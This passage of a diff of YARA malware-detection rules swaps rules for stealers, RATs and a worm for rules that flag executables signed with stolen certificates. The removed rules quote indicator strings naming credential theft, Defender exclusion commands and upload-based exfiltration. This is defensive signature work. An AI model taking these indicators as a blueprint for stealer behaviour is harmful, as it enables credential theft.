-		$c4 = "START /b \"\" cmd /c DEL \"" wide
-		$c5 = "process call create cmd /c START" wide
-		$c6 = "net config server /autodisconnect:" wide
-		$c7 = "/NOBREAK>NUL) ELSE (START /b \"\" cmd /c DEL \"%~f" ascii
-		$c8 = ":\\_ARC\\_WorkSolution\\cryptopp" ascii
-		$e1 = /\.crYpt([A-F]{0,1}(\d+)?)?/ fullword wide
-		$e2 = ".dnt___.crYpt" wide nocase
-		$s1 = "create_directory" fullword ascii
-		$s2 = "create_directories" fullword ascii
-		$s3 = "NoClose" fullword ascii
-		$s4 = "StartMenuLogOff" fullword ascii
-		$s5 = "NoLogOff" fullword ascii
-		$s6 = "DisableTaskMgr" fullword ascii
-		$s7 = "DisableChangePassword" fullword ascii
-		$s8 = "HideFastUserSwitching" fullword ascii
-		$s9 = "RemotePath" fullword ascii
+		thumbprint = "ad9fa264674c152b2298533e41e098bcaa0345af"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $c* ) or 7 of ( $s* ) or ( 3 of ( $c* ) and 4 of ( $s* ) ) or ( 1 of ( $e* ) and ( 1 of ( $c* ) and 1 of ( $s* ) ) ) or ( all of ( $e* ) and ( 1 of ( $c* ) or 1 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Tekhnokom" and pe.signatures [ i ] . serial == "13:03:9d:a3:b2:92:4b:7a:8b:0a:2a:c4:63:7c:2e:fa" )
 }
-rule DITEKSHEN_MALWARE_Win_Rootteamstealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : FILE
 {
 	meta:
-		description = "Detects RootTeam infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3b57ff3e-09cf-52be-ac7f-45ee832d70ab"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "5e17d055-26d7-5dde-a905-9d03fb164fa2"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10401-L10417"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4444-L4455"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d1693865253067527d58c980653d550b55d022d5a394b88090a958e5d5818143"
+		logic_hash = "5f0f5dac599923f385fcd8e8b14349263cabe1c83242fe097d9fb26ea0567c1a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "RootTeamStl" ascii
-		$x2 = "Bot: https://t.me/rootteam_bot" ascii
-		$x3 = "rootteam_bot" ascii
-		$x4 = "Root Team" ascii
-		$s1 = "-ldflags=\"-s -w -H windowsgui -X" ascii
-		$s2 = "'RootTeamStl/vars." ascii
-		$s3 = "{ Hostname string \"json:\\\"hostname\\\"\"; EncryptedUsername string \"json:\\\"encryptedUsername\\\"\"; EncryptedPassword string \"json:\\\"encryptedPassword\\\"\" }" ascii
-		$s4 = "\\Program Files (x86)\\Steam\\config\\loginusers.vdf" ascii
-		$s5 = /RootTeamStl\/managers\/(browser|coldwallets|discord|filegrabber|steam|userinformation)?/ ascii
+		thumbprint = "db3d9ccf11d8b0d4f33cf4dc93689fdd942f8fbe"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 4 of ( $s* ) or 5 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BE SOL d.o.o." and pe.signatures [ i ] . serial == "2a:bd:2e:ef:14:d4:80:df:ea:9c:a9:fd:d8:23:cf:03" )
 }
-rule DITEKSHEN_MALWARE_Win_Espioloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_08622B9Dd9D78E67678Ecc21E026522E : FILE
 {
 	meta:
-		description = "Detects Espio loader and obfuscator"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fb2be984-abd6-5f71-b448-d41c9c3e35c5"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "922282e9-9f34-537b-9fd1-283ae44b9b54"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10438-L10451"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4457-L4468"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ad77a50db48f12e6f6465652b24fc1daa56375bb27e37e0eead1bea55b89e0c"
+		logic_hash = "7e572c4241d92ad34efd91c3f6338da4093c83d84a734766448ac7cb2a72bc0c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.EspioLoader"
-
-	strings:
-		$pdb = /\\loader\\x64\\(Release|Debug)\\Espio\.pdb/ ascii
-		$s1 = "obfuscatedPayload" fullword wide
-		$s2 = "OBFUSCATEDPAYLOAD" fullword wide
-		$s3 = "\\??\\C:\\Windows\\System32\\werfault.exe" fullword wide
-		$s4 = "C:\\windows\\system32\\ntdll.dll" fullword ascii
+		thumbprint = "a7d86073742ea55af134e07a00aefa355dc123be"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $pdb or 3 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kayak Republic af 2015 APS" and pe.signatures [ i ] . serial == "08:62:2b:9d:d9:d7:8e:67:67:8e:cc:21:e0:26:52:2e" )
 }
-rule DITEKSHEN_MALWARE_Win_Celestybinderloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5A17D5De74Fd8F09Df596Df3123139Bb : FILE
 {
 	meta:
-		description = "Detects Celesty Binder loader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9c3404b7-311c-565d-b0fa-cfa80ba97289"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "871d9840-4540-58d3-980e-d356c856dbca"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10453-L10466"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4470-L4481"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8c9ffd48c9c8cd345dccfb48bcb345282f9978f7cf906a61e2ea81c48486b16d"
+		logic_hash = "f5ff9f7d857da3329708ba9c0bfac0999b04aeb170fb60387f4b48fa6029a641"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\DarkCoderSc\\Desktop\\Celesty Binder\\Stub\\STATIC\\Stub.pdb" ascii
-		$s2 = "DROPIN" fullword ascii wide
-		$s3 = "EXEC" fullword ascii wide
-		$s4 = "RBIND" fullword ascii wide
-		$s5 = "%LAPPDATA%" fullword ascii wide
-		$s6 = "%USERDIR%" fullword ascii wide
+		thumbprint = "1da887a57dddd7376a18f75841559c9682f78b04"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTA FIS d.o.o." and pe.signatures [ i ] . serial == "5a:17:d5:de:74:fd:8f:09:df:59:6d:f3:12:31:39:bb" )
 }
-rule DITEKSHEN_MALWARE_Win_Blitzgrabber : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_15Da61D7E1A631803431561674Fb9B90 : FILE
 {
 	meta:
-		description = "Detects BlitzGrabber infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4240527e-c2f8-5424-986a-c1616fafb9bb"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d1fd8200-0960-567d-9bb6-2bd1ed99f61b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10468-L10487"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4483-L4494"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8baceacf3c2af61e00b31e8106820b6f1ce2e7a9d98eaed965e698109ae08314"
+		logic_hash = "4d30a4bf1b0425081369351df707be0531dcc1751512d9012a859b621d61a1b3"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "**BLITZED GRABBER V" wide
-		$x2 = "\\BlitzedGrabberV" ascii
-		$x3 = "Kyanite" ascii wide nocase
-		$s1 = /;\/\/(SCREENSHOT|PASSWORDS|FORKBOMB|MELTSTUB)\/\// ascii wide
-		$s2 = "KryptedWare" wide
-		$s3 = "chckcopyTemp" wide
-		$s4 = "chckscreenShot" wide
-		$s5 = "Plugin.Banking." ascii
-		$s6 = "sChromiumPswPaths" ascii
-		$s7 = ".CreateDownloadLink(" ascii
-		$s8 = "CaptureScreen()" ascii
-		$s9 = ".UploadFile(\"https://api.anonfiles.com/upload\"" ascii
+		thumbprint = "9a9bc3974e3cbbabdeb2b6debdc0455586e128a4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 7 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAY DANCE STUDIO d.o.o." and pe.signatures [ i ] . serial == "15:da:61:d7:e1:a6:31:80:34:31:56:16:74:fb:9b:90" )
 }
-rule DITEKSHEN_MALWARE_Win_Bagle : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_58Aa64564A50E8B2D6E31D5Cd6250Fde : FILE
 {
 	meta:
-		description = "Detect Bagle / Beagle email worm"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "32632bdf-6cf5-5542-8e1f-70686139a465"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "b6eff323-241a-5f11-837f-bfacdc547d89"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10489-L10505"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4496-L4507"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4c3a09f10c792de1ab25001da29ea2fee84c583d49d9a5225817644aabde2dea"
+		logic_hash = "7383dfc8b22379dc69cd1d93d2da40e177ba1e3b0b8b8891afb8ce594269d170"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "SOFTWARE\\DateTime" fullword ascii
-		$s2 = "%s?p=%lu" fullword ascii
-		$s3 = "-upd" ascii
-		$s4 = "[%RAND%]" fullword ascii
-		$s5 = "MAIL FROM:<%s>" fullword ascii
-		$s6 = "RCPT TO:<%s>" fullword ascii
-		$s7 = "Message-ID: <%s%s>" fullword ascii
-		$s8 = "Content-Disposition: attachment; filename=\"%s%s\"" fullword ascii
-		$s9 = "http://www.%s" fullword ascii
+		thumbprint = "a7b43a5190e6a72c68e20f661f69ddc24b5a2561"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foreground" and pe.signatures [ i ] . serial == "58:aa:64:56:4a:50:e8:b2:d6:e3:1d:5c:d6:25:0f:de" )
 }
-rule DITEKSHEN_MALWARE_Win_Ragestealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Bbd4Dc3768A51Aa2B3059C1Bad569276 : FILE
 {
 	meta:
-		description = "Detect Rage / Priv8 infostealer"
-		author = "ditekShen"
-		id = "dfc1abaa-d975-5e6a-ad4d-344031b0c40c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "cb5214b4-1af5-5b31-b690-6531139e92b1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10507-L10522"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4509-L4520"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a26b86845bcd62d4a360a8dae9cfa56b5d96ebc521f224c18a01cc0a2bd958e9"
+		logic_hash = "d506c2d6e630fabe1d4b805cd31aa54b04959db80630f656b3460c869ad544fa"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "\\RageStealer\\obj\\" ascii
-		$x2 = "Priv8 Stealer" wide
-		$s1 = "\\Screen.png" wide
-		$s2 = "Content-Disposition: form-data; name=\"document\"; filename=\"{1}\"" wide
-		$s3 = "NEW LOG FROM" wide
-		$s4 = "GRABBED SOFTWARE" wide
-		$s5 = "DOMAINS DETECTED" wide
-		$s6 = "snder" ascii
+		thumbprint = "36936c4aa401c3bbeb227ce5011ec3bdc02fdd14"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 4 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JJ ELECTRICAL SERVICES LIMITED" and pe.signatures [ i ] . serial == "00:bb:d4:dc:37:68:a5:1a:a2:b3:05:9c:1b:ad:56:92:76" )
 }
-rule DITEKSHEN_MALWARE_Win_Abubasbanditbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3A236F003Bdefc0C55Aa42D9C6C0B08E : FILE
 {
 	meta:
-		description = "Detects Abubasbandit Bot. Observed to drop cryptocurrency miner detected by MALWARE_Win_CoinMiner02"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8bedd1f7-bd77-5f26-8665-1d23fe56100f"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "02c95d8f-f694-5d0f-bf79-b806334e8af3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10524-L10541"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4522-L4533"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aae40178dadff720b42d211a025fd696eabdcc91761c6a91809f5f088c588c31"
+		logic_hash = "9930b2d3fdbd2f6da17d78dfbfe6229f0bd004686e4cc4960720710241237e48"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "magickeycmd" ascii
-		$x2 = "chat_id" ascii
-		$x3 = "GetTempPathW" ascii
-		$x4 = "Add-MpPreference" ascii
-		$x5 = "-Command" ascii
-		$s1 = "application/x-www-form-urlencoded" ascii
-		$s2 = "gzip, deflate/index.html" ascii
-		$s3 = "powershellAdd-MpPreference -ExclusionPath" ascii
-		$s4 = "tar-xf-C" ascii
-		$s5 = "temp_file.bin" ascii
+		thumbprint = "5ba147ebae6089f99823b1640c305b337b1a4c36"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 4 of ( $x* ) and 2 of ( $s* ) ) or ( ( all of ( $s* ) and 3 of ( $x* ) ) ) or ( 8 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Assurio" and pe.signatures [ i ] . serial == "3a:23:6f:00:3b:de:fc:0c:55:aa:42:d9:c6:c0:b0:8e" )
 }
-rule DITEKSHEN_MALWARE_Win_Oracrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_010000000001302693Cb45 : FILE
 {
 	meta:
-		description = "Detects OracRAT / Comfoo / Babar"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "53f3778e-56d5-5390-8ce7-82d4ede46be4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0ab8e30d-dd75-5dd1-9bc8-413e59d5d310"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10543-L10557"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4535-L4547"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "078a5df9f3d0bb8213ea2fe28eefdb453ef186e6c1f62d3ba10cb04fca047700"
+		hash = "74069d20e8b8299590420c9af2fdc8856c14d94929c285948585fc89ab2f938f"
+		logic_hash = "74c5d88012ab3e975123cde51ae3d01b6bee1ad0d6c0f5492c507fb2472b7532"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "\\\\.\\DevCtrlKrnl" fullword ascii
-		$s2 = "SOFTWARE\\Microsoft\\IE4\\Setup" fullword ascii
-		$s3 = "\\PLUGINS" fullword ascii
-		$s4 = "\\config\\sam" fullword ascii
-		$s5 = "\\iexplore.exe\" about:blank" fullword ascii
-		$s6 = "usbak.sys" fullword ascii
-		$s7 = "userctfm" fullword ascii
+		thumbprint = "bc5fcb5a2b5e0609e2609cff5e272330f79b2375"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AutoIt Consulting Ltd" and pe.signatures [ i ] . serial == "01:00:00:00:00:01:30:26:93:cb:45" )
 }
-rule DITEKSHEN_MALWARE_Win_Phemedronestealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3F8D23C136Ae9Cbeeac7605B24Ec0391 : FILE
 {
 	meta:
-		description = "Detects Phemedrone Stealer infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "297aab1f-351c-5955-8a19-9aa2b7c94748"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "86617b78-86b0-59dc-a072-cb4acecd60e1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10559-L10580"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4565-L4576"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "74e150cc971f5648f9e3f6146afba162b1a29cf2744c862b2320db52c2efa930"
+		logic_hash = "f074e141e07cbf6b5b4726b52faa382b8ece809804dcfb9d45a5b2450125b5b7"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$p1 = /\{ file = \{(0|file)\}, data = \{(1|data)\} \}/ ascii wide
-		$p2 = "{ <>h__TransparentIdentifier0 = {0}, match = {1} }" wide
-		$p3 = "{ <>h__TransparentIdentifier1 = {0}, encrypted = {1} }" wide
-		$p4 = "{<>h__TransparentIdentifier0}, match = {match} }" ascii
-		$p5 = "{<>h__TransparentIdentifier1}, encrypted = {encrypted} }" ascii
-		$s1 = "<KillDebuggers>b__" ascii
-		$s2 = "<ParseExtensions>b__" ascii
-		$s3 = "<ParseDiscordTokens>b__" ascii
-		$s4 = "<IsVM>b__" ascii
-		$s5 = "<Key3Database>b__" ascii
-		$s6 = "masterPass" ascii
-		$s7 = "rootLocation" ascii
-		$s8 = "rgsServiceNames" ascii
-		$s9 = "rgsFilenames" ascii
+		thumbprint = "ff481ea6a887f3b5b941ff7d99a6cdf90c814c40"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $p* ) and 3 of ( $s* ) ) or ( 3 of ( $p* ) and 4 of ( $s* ) ) or ( 7 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bandicam Company" and pe.signatures [ i ] . serial == "3f:8d:23:c1:36:ae:9c:be:ea:c7:60:5b:24:ec:03:91" )
 }
-rule DITEKSHEN_MALWARE_Win_WSHRAT : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3972443Af922B751D7D36C10Dd313595 : FILE
 {
 	meta:
-		description = "Detects WASHRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e7940b7f-51dd-5a32-899b-64310f27bf3e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "21ada866-167a-54d5-a137-7720de32520e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10582-L10600"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4578-L4589"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "297bfe65815637a464e2a8fc23570c6e79694ffe0467d5898b7c845f1450de95"
+		logic_hash = "764d0a288edd3bac90c0b93319f4f8ff8a7d567cda42aa52fe6114f4e56216ad"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "WSH Rat v" wide
-		$x2 = "SOFTWARE\\WSHRat" wide
-		$x3 = "WSH Remote" wide nocase
-		$x4 = "WSHRAT" wide nocase
-		$s1 = "shellobj.regwrite \"HKEY_" ascii nocase
-		$s2 = "shellobj.run(\"%comspec% /c" ascii nocase
-		$s3 = "objhttpdownload.setrequestheader \"user-agent:\"," ascii nocase
-		$s4 = "WScript.CreateObject(\"Shell.Application\").ShellExecute" ascii nocase
-		$s5 = "objwmiservice.ExecQuery(\"select" ascii nocase
-		$s6 = "httpobj.open(\"post\",\"http" ascii nocase
-		$s7 = /(rdp|keylogger|get-pass|uvnc)\|http/ wide
+		thumbprint = "d89e3bd43d5d909b47a18977aa9d5ce36cee184c"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( 6 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sore Loser Games ApS" and pe.signatures [ i ] . serial == "39:72:44:3a:f9:22:b7:51:d7:d3:6c:10:dd:31:35:95" )
 }
-rule DITEKSHEN_MALWARE_Win_Rustystealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_37F3384B16D4Eef0A9B3344B50F1D8A3 : FILE
 {
 	meta:
-		description = "Detect Rusty / Luca stealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "af39f88c-e0df-51f6-bb11-f3a7231180d0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "a7eef803-2c9e-5f23-acde-22ae2223fec2"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10602-L10625"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4591-L4602"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e60e66360c8f97a31e75cd90a12519f75f3a672874fc985a8da1d4d02e185b4d"
+		logic_hash = "4496052ff9677e0d031471e4ae9b3541099a2dbe024b4b5ba3f757800bfdcb07"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "EdgeMicrosoftedgechromiumChromium7star7StaramigoAmigobraveBrave" ascii
-		$s2 = "BrowserchromeChromekometaKometaorbitumOrbitumsputnikSputniktorchTorchucozmediaUranuCozMediavivaldiVivaldiatom" ascii
-		$s3 = ".kdbx.pdf.doc.docx.xls.xlsx.ppt.pptx.odt.odp\\logscx\\sensfiles.zip" ascii
-		$s4 = "dumper.rs" ascii
-		$s5 = "decryption_core.rs" ascii
-		$s6 = "anti_emulation.rs" ascii
-		$s7 = "discord.rs" ascii
-		$s8 = /\\logscx\\(passwords_|cookies_|creditcards_)/ ascii
-		$s9 = "VirtualBoxVBoxVMWareVMCountry" ascii
-		$s10 = "New Log From ( /  )" ascii
-		$s11 = "BrowserChromeKometaOrbitumSputnikTorchUranuCozMediaVivaldiAtomMail" ascii
-		$s12 = "BrowserBraveSoftwareCentBrowserChedotChrome" ascii
-		$s13 = "ChromeKometaOrbitumSputnikTorchUranuCozMediaVivaldi" ascii
-		$s14 = "hostnameencryptedUsernameencryptedPasswordstruct" ascii
-		$s15 = "encryptedPassword" fullword ascii
-		$s16 = "AutoFill@~" fullword ascii
+		thumbprint = "3fcdcf15c35ef74dc48e1573ad1170b11a623b40"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sore Loser Games ApS" and pe.signatures [ i ] . serial == "37:f3:38:4b:16:d4:ee:f0:a9:b3:34:4b:50:f1:d8:a3" )
 }
-rule DITEKSHEN_MALWARE_Win_Simplepacker : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00B3969Cd6B2F913Acc99C3F61Fc14852F : FILE
 {
 	meta:
-		description = "Detects Hydrochasma packer / dropper"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "449f7531-408f-5bda-aa64-d148c363c3e5"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2cd4cee3-0adc-595f-b86f-7c515cd0ea64"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10627-L10638"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4604-L4619"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e2c07947fdf53814669250052f6cceb7412aa302422f3a0b430879da638c7e6a"
+		logic_hash = "4ee7f3da2ae707517c1c426e6a73fdede51514e4ddf60b93fd77c1b6c23e82c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$p1 = "\\cloud-compiler-" ascii
-		$p2 = "\\deps\\simplepacker.pdb" ascii
-		$s1 = "uespemosarenegylmodnarodsetybdetqueue" ascii
-		$s2 = "None{\"" ascii
+		thumbprint = "bd9cadcfb5cde90f493a92e43f49bf99db177724"
+		hash1 = "a4d9cf67d111b79da9cb4b366400fc3ba1d5f41f71d48ca9c8bb101cb4596327"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $p* ) or ( 1 of ( $p* ) and all of ( $s* ) ) )
